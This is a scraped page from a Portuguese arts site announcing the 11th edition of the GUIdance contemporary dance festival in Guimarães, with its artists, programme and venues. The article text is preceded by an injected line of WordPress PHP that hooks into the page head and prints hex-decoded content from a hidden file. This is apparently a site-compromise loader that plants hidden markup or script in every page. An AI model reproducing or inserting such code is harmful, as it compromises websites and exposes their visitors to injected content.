if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } 11.ª edição do GUIdance - artesentreasletras.com.pt

11.ª edição do GUIdance

O espanto do corpo e a vontade de mudar o mundo (através da dança) emergem de 3 a 12 de Fevereiro em Guimarães. A 11ª edição do GUIdance – Festival Internacional de Dança Contemporânea está prestes a apresentar 10 criações, incluindo 3 coproduções d’A Oficina e 2 estreias nacionais, com Sofia Dias & Vítor Roriz em destaque e nomes como Moritz Ostruschnjak, Maria Fonseca, Peeping Tom, Vera Mantero, Catarina Miranda, Anastasia Valsamaki e Wim Vandekeybus a juntarem-se a esta celebração.
Numa edição que nos inquieta com temas de grande abrangência como uma natureza faminta de verdade, resistência, ironia, contradição, violência, realidade e ficção, perversidade e transformação, luz e escuridão, limites humanos e convívio com o desconhecido, a demonstração da fonte inesgotável de criatividade faz-se não só com espetáculos mas também através de Talks, Marterclasses, Debates, Embaixadores da Dança e Ensaio Aberto para escolas de dança que estreitam laços e fazem expandir este universo. O festival ganha vida nos palcos do Centro Cultural Vila Flor (CCVF) e também nas Black Boxes do Centro Internacional das Artes José de Guimarães (CIAJG) e da Fábrica Asa.